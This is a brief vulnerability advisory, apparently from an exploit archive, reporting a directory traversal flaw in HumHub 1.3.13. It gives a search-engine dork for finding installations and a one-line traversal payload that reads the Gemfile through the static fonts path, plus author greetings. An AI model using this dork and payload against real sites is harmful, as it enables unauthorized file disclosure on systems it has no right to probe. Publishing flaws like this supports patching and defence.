Headline
Humhub 1.3.13 Directory Traversal
Humhub version 1.3.13 suffers from a directory traversal vulnerability.
====================================================================================================================================| # Title : Humhub v1.3.13 Directory traversal Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit) | | # Vendor : https://www.humhub.org/en/download/package/humhub-1.3.13.zip | | # Dork : "Propulsé par HumHub" |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================